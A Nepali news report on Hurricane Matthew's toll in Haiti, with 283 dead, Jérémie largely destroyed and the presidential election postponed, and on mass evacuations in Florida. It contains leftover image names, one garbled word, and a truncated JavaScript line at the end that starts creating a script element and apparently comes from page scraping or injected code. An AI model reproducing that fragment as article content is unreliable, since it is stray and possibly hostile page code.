काठमाडौं- म्याथू नामक आँधीले हाइटीमा विनाश मच्चाएको छ।  आँधीका कारण त्यहाँ मृत्यु हुनेको संॐया २ सय ८३ पुगेको सरकारी अधिकारीहरुले जनाएका छन्।  haiti2

हाइटी र क्यूबापछि यो आँधी अब अमेरिकाको फ्लोरिडातर्फ अघि बढेको जनाइएको छ।  विनाशकारी आँधीले हाइटीको सबैभन्दा महत्वपूर्ण शहर जेरेमीलाई ध्वस्त पारेको छ।  शहरका ८० प्रतिशत घर ढलेका छन्।  दक्षिणी शहर सूदमा ३० हजार घर तहसनहस भएको छ। आँधीका कारण हाइटीमा राष्ट्रपति निर्वाचन स्थगित गरिएको छ।

haiti-stroom

क्यारिबियन देशमा पछिल्लो दशकमा आएको आँधीमा म्याथ्यू सबैभन्दा शक्तिशाली भएको मानिएको छ।

त्यहाँ १२५ किलोमिटर प्रतिघन्टाको गतिमा हावा चलेको थियो। र, यो पछिल्लो १२ वर्षकै शक्तिशाली आँधी भएको बताइएको छ ।

आँधी आउने सक्ने भन्दै अमेरिकाको फ्लोरिडा राज्यका २० लाख भन्दा बढी मानिसहरुलाई सुरक्षित स्थानमा सारिएको थियो। अमेरिकाको चार राज्यमा संकटकाल घोषणा गरी उद्धार टोली समेत तयारी अवस्थामा राखिएको थियो।

 var d=document;var s=d.createElement(‘script’);